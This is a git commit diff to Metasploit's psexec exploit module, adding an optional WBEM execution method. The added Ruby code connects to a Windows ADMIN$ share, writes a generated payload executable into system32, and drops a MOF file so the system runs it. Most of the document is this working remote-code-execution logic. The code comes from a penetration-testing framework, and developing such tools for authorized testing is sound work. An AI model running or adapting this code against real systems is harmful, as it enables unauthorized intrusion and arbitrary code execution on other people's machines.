add wbem exec method for psexec as optional, fix #3972, thanks to pbk-df3 for patch
git-svn-id: file:///home/svn/framework3/trunk@12171 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
b823ea9876
commit
3a6a02e43c
|
@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Remote::SMB::Authenticated
|
include Msf::Exploit::Remote::SMB::Authenticated
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::WbemExec
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -85,7 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true])
|
OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
|
||||||
|
OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -127,6 +129,34 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
report_auth_info(report_hash)
|
report_auth_info(report_hash)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if datastore['MOF_UPLOAD_METHOD']
|
||||||
|
# payload as exe
|
||||||
|
print_status("Trying wbemexec...")
|
||||||
|
print_status("Uploading Payload...")
|
||||||
|
if datastore['SHARE'] != 'ADMIN$'
|
||||||
|
print_error('Wbem will only work with ADMIN$ share')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
simple.connect("ADMIN$")
|
||||||
|
filename = rand_text_alpha(8) + ".exe"
|
||||||
|
exe = generate_payload_exe
|
||||||
|
fd = smb_open("\\system32\\#{filename}", 'rwct')
|
||||||
|
fd << exe
|
||||||
|
fd.close
|
||||||
|
print_status("Created %SystemRoot%\\system32\\#{filename}")
|
||||||
|
|
||||||
|
# mof to cause execution of above
|
||||||
|
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||||
|
mof = generate_mof(mofname, filename)
|
||||||
|
print_status("Uploading MOF...")
|
||||||
|
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||||
|
fd << mof
|
||||||
|
fd.close
|
||||||
|
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||||
|
|
||||||
|
# Disconnect from the ADMIN$
|
||||||
|
simple.disconnect("ADMIN$")
|
||||||
|
else
|
||||||
filename = rand_text_alpha(8) + ".exe"
|
filename = rand_text_alpha(8) + ".exe"
|
||||||
servicename = rand_text_alpha(8)
|
servicename = rand_text_alpha(8)
|
||||||
|
|
||||||
|
@ -306,7 +336,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
raise $!
|
raise $!
|
||||||
rescue ::Exception
|
rescue ::Exception
|
||||||
end
|
end
|
||||||
|
end
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue